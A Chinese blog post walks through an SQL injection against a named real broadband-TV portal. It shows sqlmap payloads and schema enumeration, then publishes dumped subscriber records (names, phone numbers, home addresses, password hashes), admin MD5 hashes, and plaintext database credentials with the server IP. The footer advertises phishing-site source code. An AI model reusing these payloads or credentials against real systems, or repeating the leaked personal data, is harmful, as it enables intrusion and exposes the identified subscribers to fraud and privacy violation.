本网站可以出售:只需60000元直接拥有。QQ:939804642
您当前的位置:首页 > 网站建设 > 网站维护
| php | asp | css | H5 | javascript | Mysql | Dreamweaver | Delphi | 网站维护 | 帝国cms | React | 考试系统 | ajax | jQuery | 小程序 |

中国联通某宽带数字家庭网站SQL注入过程
51自学网 2021-06-02 19:07:04
  网站维护

小风最近没更新什么教程,今天必须更新比较有技术含量的


网址为:http://fjportal.vcomlive.com/

页面底部显示该网站为

福建联通宽带数字家庭 河南网视传媒有限公司 郑州威科姆科技股份有限公司 联合运营

注入点:

随便点开一个节目,链接http://fjportal.vcomlive.com/play/play.php?id=LBQG1120572

id参数存在注入

SQLMAP

code 区域
sqlmap identified the following injection points with a total of 205 HTTP(s) requests:---Place: GETParameter: id    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause    Payload: id=LBQG1120572' AND 6594=6594 AND 'vkEP'='vkEP    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause    Payload: id=LBQG1120572' AND (SELECT 3565 FROM(SELECT COUNT(*),CONCAT(0x7162707971,(SELECT (CASE WHEN (3565=3565) THEN 1 ELSE 0 END)),0x7173637671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'LXuR'='LXuR    Type: UNION query    Title: MySQL UNION query (NULL) - 60 columns    Payload: id=-6386' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7162707971,0x6f6a724865474f786170,0x7173637671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#    Type: AND/OR time-based blind    Title: MySQL > 5.0.11 OR time-based blind    Payload: id=-8719' OR 5082=SLEEP(5) AND 'GCJr'='GCJr---web application technology: Nginx, PHP 5.3.10back-end DBMS: MySQL 5.0current database:    'Portal'current user is DBA:    Falseavailable databases [3]:[*] information_schema[*] Portal[*] testDatabase: Portal[193 tables]+---------------------------------------+| FJtoCRI_imgUP                         || FJtoCRI_mv                            || KS_RES                                || RES_KNOWLEDGE_XLZG                    || SHARE_KNOWLEDGE_STRUCTURE             || 17_10_mpeg_list                       || 17_1_mpeg_list                        || 17_2_mpeg_list                        || 17_3_mpeg_list                        || 17_4_mpeg_list                        || 17_5_mpeg_list                        || 17_6_mpeg_list                        || 17_7_mpeg_list                        || 17_8_mpeg_list                        || 17_9_mpeg_list                        || language                              || a_log                                 || a_pass_err                            || a_pass_err1                           || ad_channelad                          || ad_policy                             || ad_policymovie                        || area_info                             || area_mpeg_relation                    || business_application                  || business_img                          || business_menu                         || business_property                     || business_server_info                  || business_use_type                     || channel_list                          || channel_list_content                  || channel_teleplay                      || check_config                          || dhcp_config                           || diskmpeg_unusemovie                   || diskmpeg_unusempeg                    || distributespeed                       || dns_template                          || genre                                 || image                                 || image_config                          || image_preview                         || image_purpose                         || imgtype                               || iptable                               || key_info                              || layout_image                          || litv_channel                          || litv_program                          || logo                                  || logo_terminalversion_bussiness        || lvs_config                            || menu_image                            || menu_movie                            || menu_mpeg                             || menu_mpeg_tempt                       || menu_teleplay                         || movieType                             || movie_appraisal                       || movie_down                            || movie_down_path                       || movies                                || movies_segment                        || moviesparam                           || mpeg_list                             || mpeg_list_contrast                    || mpeg_list_garbage                     || mpeg_list_tmp                         || mpeg_list_vcominfodel                 || mpeg_subsection                       || mtmp                                  || muxtype                               || near_area_list                        || net_mpeg_list_contrast                || new_update_movie                      || orders                                || origin                                || portal_status                         || power_ad                              || power_ad_img                          || power_ad_terminalversion_bussiness    || private_elem                          || private_group_info                    || private_menu                          || product_info                          || product_service_info                  || program_format                        || rating                                || rec_download_info                     || rec_server                            || record_programme                      || server_channel_list                   || server_channel_list_tmp               || service_movie                         || share                                 || share_server                          || show_kind                             || show_menu_type                        || squid_server                          || standard_layout                       || standard_layout_element               || standard_menu                         || standard_menu_servicecode             || stb_login_record                      || stb_update_log                        || stb_update_plan                       || stb_update_result                     || stb_update_verinfo                    || stb_upgrade_server                    || sub_product                           || sub_status_rec                        || sub_terminal                          || sub_update_check                      || sub_welcome_info                      || subscriber                            || subscriber_area_bind                  || subscriber_mac_bind                   || subscriber_update_password            || sys_data_change                       || sys_data_change_task                  || sys_data_sync_plan                    || sys_log                               || sys_mem_server                        || sys_para                              || teleplay                              || teleplayType                          || teleplay_appraisal                    || teleplay_movie                        || teleplayparam                         || temp_imagely                          || terminal_type                         || terminal_version                      || tmp13745_1331714671_100118401         || tmp14769_1333095596_1304181233        || tmp15445_1339150102_1583395861        || tmp15815_1339985671_1433755063        || tmp18236_1354004741_954412442         || tmp22971_1339987542_1501512556        || tmp22971_1339987917_2036377457        || tmp24367_1346666299_566833485         || tmp24384_1339150528_868540780         || tmp24889_1339150553_1857535896        || tmp24988_1328064193_2079492051        || tmp26065_1340099129_1194820177        || tmp26065_1340099480_716882780         || tmp415_1375412218_383871281           || tmp415_1375412226_903953738           || tmp415_1375412227_2053835275          || tmp415_1375412230_825013410           || tmp415_1375412233_2018101676          || tmp415_1375412236_316861279           || tmp415_1375412237_626735183           || tmp415_1375412237_97842698            || tmp415_1375412239_1049705866          || tmp415_1375412239_245650000           || tmp415_1375412239_570577339           || tmp415_1375412240_751796636           || tmp415_1375412241_1385265633          || tmp4769_1357029751_1253732955         || tmp4769_1357029753_84902856           || tmp4769_1357029757_2071240884         || tmp4769_1357029761_1926550523         || tmp4769_1357029765_1700742570         || tmp4769_1357029766_196773747          || tmp4769_1357029767_629723364          || tmp4769_1357029768_874953831          || tmp4769_1357029769_21601231           || tmp4769_1357029769_242942854          || tmp4769_1357029770_1237987098         || tmp4769_1357029772_2007113618         || tmp5389_1375412614_1278048970         || tmp5389_1375412622_1064652119         || tmp5389_1375412627_310855987          || tmp5389_1375412630_1742474077         || tmp5389_1375412633_196863473          || tmp5389_1375412634_544531639          || tmp5389_1375412634_796192373          || tmp5389_1375412636_501378703          || tmp5389_1375412636_513621861          || tmp5389_1375412638_135840808          || tmp8937_1324284293_1754020834         || tmp8937_1324284428_1832489117         || top_menu_pv                           || top_movie_pv                          || top_teleplay_appraisal                || union_server                          || unuse_movies                          || update_server_result                  || userinfo                              || video_format                          || video_server                          || xlzg_zy                               |+---------------------------------------+



来看一下表记录数

code 区域
Database: Portal+------------------------------------+---------+| Table                              | Entries |+------------------------------------+---------+| sub_terminal                       | 1142859 || subscriber                         | 1142370 || image_preview                      | 221940  || stb_login_record                   | 183306  || mpeg_list                          | 139214  || image                              | 134678  || mpeg_list_contrast                 | 133416  || movies                             | 114600  || menu_mpeg                          | 113708  || sub_product                        | 105298  || moviesparam                        | 97854   || a_pass_err                         | 38990   || virtualmovie                       | 30881   || `17_6_mpeg_list`                   | 29139   || `17_8_mpeg_list`                   | 26555   || `17_1_mpeg_list`                   | 24876   || `17_5_mpeg_list`                   | 23402   || `17_2_mpeg_list`                   | 21502   || mpeg_list_vcominfodel              | 19201   || sub_status_rec                     | 17943   || sys_log                            | 12867   || subscriber_update_password         | 7608    || tmp26065_1340099129_1194820177     | 5771    || tmp22971_1339987542_1501512556     | 5770    || tmp4769_1357029742_2139185939      | 5557    || standard_menu                      | 5270    || FJtoCRI_mv                         | 5206    || FJtoCRI_imgUP                      | 4367    || menu_image                         | 3841    || tmp415_1375412233_2018101676       | 3507    || tmp5389_1375412630_1742474077      | 3507    || tmp4769_1357029761_1926550523      | 3480    || stb_update_log                     | 3419    || menu_movie                         | 3348    || tmp4769_1357029757_2071240884      | 3317    || tmp4769_1357029753_84902856        | 3299    || tmp5389_1375412623_650748860       | 3261    || standard_menu_servicecode          | 2964    || tmp8937_1324284293_1754020834      | 2899    || tmp415_1375412230_825013410        | 2848    || tmp5389_1375412627_310855987       | 2848    || movie_appraisal                    | 2837    || teleplayparam                      | 2637    || teleplay                           | 2335    || a_log                              | 1953    || genre                              | 1897    || tmp14769_1333095596_1304181233     | 1815    || tmp24988_1328064193_2079492051     | 1684    || tmp24367_1346666299_566833485      | 1664    || tmp415_1375412240_751796636        | 1631    || tmp5389_1375412637_2065803658      | 1631    || tmp4769_1357029770_1237987098      | 1625    || tmp13745_1331714671_100118401      | 1507    || tmp26065_1340099480_716882780      | 1476    || area_info                          | 1467    || tmp22971_1339987917_2036377457     | 1418    || tmp24384_1339150528_868540780      | 1394    || xlzg_zy                            | 1249    || tmp24889_1339150553_1857535896     | 1232    || private_elem                       | 1000    || tmp415_1375412237_97842698         | 994     || tmp5389_1375412634_796192373       | 994     || tmp4769_1357029767_629723364       | 993     || tmp4769_1357029751_1253732955      | 887     || business_server_info               | 883     || tmp415_1375412226_903953738        | 878     || tmp5389_1375412622_1064652119      | 878     || menu_teleplay                      | 851     || a_pass_err1                        | 849     || tmp15445_1339150102_1583395861     | 778     || channel_teleplay                   | 729     || server_channel_list                | 723     || top_teleplay_pv                    | 619     || standard_layout_element            | 545     || channel_list_content               | 404     || tmp15815_1339985671_1433755063     | 340     || tmp8937_1324284428_1832489117      | 300     || business_menu                      | 264     || product_service_info               | 264     || tmp415_1375412236_316861279        | 264     || tmp5389_1375412633_196863473       | 264     || layout_image                       | 255     || tmp4769_1357029765_1700742570      | 249     || area_mpeg_relation                 | 132     || movieType                          | 126     || tmp18236_1354004741_954412442      | 109     || power_ad_terminalversion_bussiness | 102     || unuse_movies                       | 98      || video_format                       | 96      || mtmp                               | 93      || temp_imagely                       | 88      || private_group_info                 | 78      || litv_channel                       | 74      || show_menu_type                     | 74      || tmp415_1375412239_245650000        | 74      || tmp4769_1357029769_242942854       | 74      || tmp415_1375412237_626735183        | 72      || tmp5389_1375412634_544531639       | 72      || near_area_list                     | 53      || standard_layout                    | 43      || RES_KNOWLEDGE_XLZG                 | 39      || power_ad_img                       | 33      || business_property                  | 30      || business_application               | 29      || business_img                       | 24      || share_server                       | 23      || teleplay_appraisal                 | 23      || stb_update_verinfo                 | 21      || stb_upgrade_server                 | 18      || iptable                            | 14      || `user`                             | 13      || channel_list                       | 13      || top_movie_appraisal                | 12      || program_format                     | 11      || key_info                           | 10      || power_ad                           | 10      || sys_para                           | 10      || top_teleplay_appraisal             | 9       || muxtype                            | 8       || origin                             | 6       || private_menu                       | 6       || product_info                       | 6       || tmp415_1375412239_570577339        | 6       || tmp4769_1357029768_874953831       | 6       || tmp5389_1375412636_513621861       | 6       || rating                             | 5       || share                              | 5       || teleplayType                       | 5       || image_purpose                      | 4       || sys_data_sync_plan                 | 4       || union_server                       | 4       || update_server_result               | 4       || imgtype                            | 3       || sys_mem_server                     | 3       || terminal_type                      | 3       || terminal_version                   | 3       || `language`                         | 2       || business_use_type                  | 2       || orders                             | 2       || squid_server                       | 2       || subscriber_mac_bind                | 2       || check_config                       | 1       || dhcp_config                        | 1       || distributespeed                    | 1       || dns_template                       | 1       || image_config                       | 1       || lvs_config                         | 1       || mpeg_list_garbage                  | 1       || portal_status                      | 1       || show_kind                          | 1       || tmp415_1375412239_1049705866       | 1       || tmp5389_1375412636_501378703       | 1       |+------------------------------------+---------+





subscriber 用户记录数有114W,而且有账号密码

code 区域
Database: Portal                                                               Table: subscriber[19 columns]+-------------+--------------+| Column      | Type         |+-------------+--------------+| address     | text         || area_code   | varchar(64)  || business_id | int(11)      || chargetype  | varchar(64)  || cl_type     | int(11)      || email       | varchar(64)  || end_time    | varchar(16)  || id          | int(11)      || locked      | tinyint(1)   || mobile      | varchar(64)  || name        | varchar(64)  || net_account | varchar(64)  || net_type    | int(11)      || nickname    | varchar(64)  || password    | varchar(255) || phone       | varchar(32)  || start_time  | int(10)      || tname       | varchar(64)  || update_flag | int(1)       |+-------------+--------------+



找几条看看

code 区域
189	27	59791020019	林小燕	<blank>	<blank>	0	NULL	1	中国联通连城分公司营业厅	2	<blank>	96e79218965eb72c92a549dd5a330112 (111111)	59791020019	17.8.10.2.	1252544121	0	1	59791020019190	27	59591020010	曾惠霞	15605956228	<blank>	0	NULL	1	泉州联通东门营业厅	2	<blank>	96e79218965eb72c92a549dd5a330112 (111111)	59591020010	17.5.6.	1252631833	A	1	59591020010191	27	59591020011	王青青	15605957987	<blank>	0	NULL	1	泉州惠安崇武经营部	2	<blank>	96e79218965eb72c92a549dd5a330112 (111111)	59591020011	17.5.6.	1252631993	A	1	59591020011192	27	59591020012	王慧霞	15605956659	<blank>	0	NULL	1	泉州惠安瑞安营业厅	2	<blank>	96e79218965eb72c92a549dd5a330112 (111111)	59591020012	17.5.6.	1252632114	A	1	59591020012193	27	59591020013	赵莉莉	15605957768	<blank>	0	NULL	1	泉州联通泉安营业厅	2	<blank>	96e79218965eb72c92a549dd5a330112 (111111)	59591020013	17.5.12.	1252632297	A	1	59591020013194	27	59591020014	唐巧娜	<blank>	<blank>	0	NULL	1	泉州 市 泉港 县区市 海天广场联通营业厅	2	<blank>	96e79218965eb72c92a549dd5a330112 (111111)	59591020014	17.5.5.	1252895776	A	1	59591020014195	27	59291020010	黄梅	<blank>	<blank>	0	NULL	1	厦门 市 同安 县区市 环东海域美溪道47号楼335号	2	<blank>	96e79218965eb72c92a549dd5a330112 (111111)	59291020010	17.2.6.	1252914142	A	1	59291020010196	27	59491020016	范剑雄	<blank>	<blank>	0	NULL	1	莆田市城厢区后巷街30号B栋502室	2	<blank>	96e79218965eb72c92a549dd5a330112 (111111)	59491020016	17.3.4.	1252981369	A	1	59491020016197	27	59491020017	陈瑞雄	<blank>	<blank>	0	NULL	1	城厢区凤凰山综合小区20栋602号(华天酒店后门)	2	<blank>	96e79218965eb72c92a549dd5a330112 (111111)	59491020017	17.3.4.	1252981489	A	1	59491020017198	27	59491020018	陈静	<blank>	<blank>	0	NULL	1	莆田市九五医院宿舍楼	2	<blank>	96e79218965eb72c92a549dd5a330112 (111111)	59491020018	17.3.4.	1252981589	A	1	59491020018199	27	59491020019	黄丽琴	<blank>	<blank>	0	NULL	1	莆田市黄石镇街道	2	<blank>	96e79218965eb72c92a549dd5a330112 (111111)	59491020019	17.3.4.	1252981690	A	1	59491020019200	27	59491020020	陈丽君	<blank>	<blank>	0	NULL	1	福建省莆田市涵江区梧塘镇溪游村下村103号	2	<blank>	96e79218965eb72c92a549dd5a330112 (111111)	59491020020	17.3.4.	1252981910	A	1	59491020020201	27	59491020021	范剑雄	<blank>	<blank>	0	NULL	1	莆田市城厢区后巷街30号B栋502室	2	<blank>	96e79218965eb72c92a549dd5a330112 (111111)	59491020021	17.3.4.	1252982331	A	1	59491020021203	27	59491020023	陈静	<blank>	<blank>	0	NULL	1	莆田市九五医院宿舍楼	2	<blank>	96e79218965eb72c92a549dd5a330112 (111111)	59491020023	17.3.4.	1252982492	A	1	59491020023204	27	59491020024	黄丽琴	<blank>	<blank>	0	NULL	1	莆田市黄石镇街道	2	<blank>	96e79218965eb72c92a549dd5a330112 (111111)	59491020024	17.3.4.	1252982552	A	1	59491020024205	27	59491020025	陈丽君	<blank>	<blank>	0	NULL	1	福建省莆田市涵江区梧塘镇溪游村下村103号	2	<blank>	96e79218965eb72c92a549dd5a330112 (111111)	59491020025	17.3.3.	1252982632	A	1	59491020025206	27	59491020026	范剑雄	<blank>	<blank>	0	NULL	1	莆田市荔城区丰美路666号	2	<blank>	96e79218965eb72c92a549dd5a330112 (111111)	59491020026	17.3.4.	1252982712	A	1	59491020026207	27	59491020027	陈瑞雄	<blank>	<blank>	0	NULL	1	莆田市荔城区丰美路666号	2	<blank>	96e79218965eb72c92a549dd5a330112 (111111)	59491020027	17.3.4.	1252982793	A	1	59491020027208	27	59491020028	陈静	<blank>	<blank>	0	NULL	1	莆田市荔城区丰美路666号	2	<blank>	96e79218965eb72c92a549dd5a330112 (111111)	59491020028	17.3.4.	1252982853	A	1	59491020028209	27	59491020029	黄丽琴	<blank>	<blank>	0	NULL	1	莆田市荔城区丰美路666号	2	<blank>	96e79218965eb72c92a549dd5a330112 (111111)	59491020029	17.3.4.	1252982913	A	1	59491020029



随便找两个用户登录下




但是点进去之后发现非法IP



貌似账号绑定IP?

没明白就没继续测试了

然后在找了找

code 区域
Database: PortalTable: userinfo[4 entries]+----+--------------+--------+---------+---------+----------+----------+----------------------------------+| id | tele         | is_sso | purview | address | username | truename | password                         |+----+--------------+--------+---------+---------+----------+----------+----------------------------------+| 1  | 0            | 0      | 15      | 0       | admin    | admin    | 88f10d639863b00bfc885ab1b88441a9 || 2  | 059138288288 | 0      | 15      | 福建办事处   | fjbsc    | 福建办事处    | e9f6f0e31308c741c9a02867eabefd5a || 3  | 0            | 0      | 15      | <blank> | kwbksy   | 高翔       | ce6f4aae92cf678e4204d7a737293401 || 9  | 156371       | 0      | 15      | <blank> | kw       | 播控值班     | 5de19cdb3da2afdd14f0bd868f790b74 |+----+--------------+--------+---------+---------+----------+----------+----------------------------------+



上面admin是后台管理员账号和md5密码,但是小风始终没找到后台登录地址,放弃!

最后又找到数据库配置信息

code 区域
Database: PortalTable: portal_status[1 entry]+---------+------------------+--------------+| db_user | db_passwd        | portal_ip    |+---------+------------------+--------------+| content | content_19990908 | 58.22.63.202 |+---------+------------------+--------------+



然后去扫了下IP 58.22.63.202 的端口,发现3306端口开放,可以远程连接MYSQL



然后可以直接拖库了!里面共有114w用户数据,小风已将漏洞提交至官方。


下载地址:
2015最新QQ空间钓鱼网站参考源码
小风原创社工挟持网站案例(猥琐+伪装)
51自学网自学EXCEL、自学PS、自学CAD、自学C语言、自学css3实例,是一个通过网络自主学习工作技能的自学平台,网友喜欢的软件自学网站。
京ICP备13026421号-1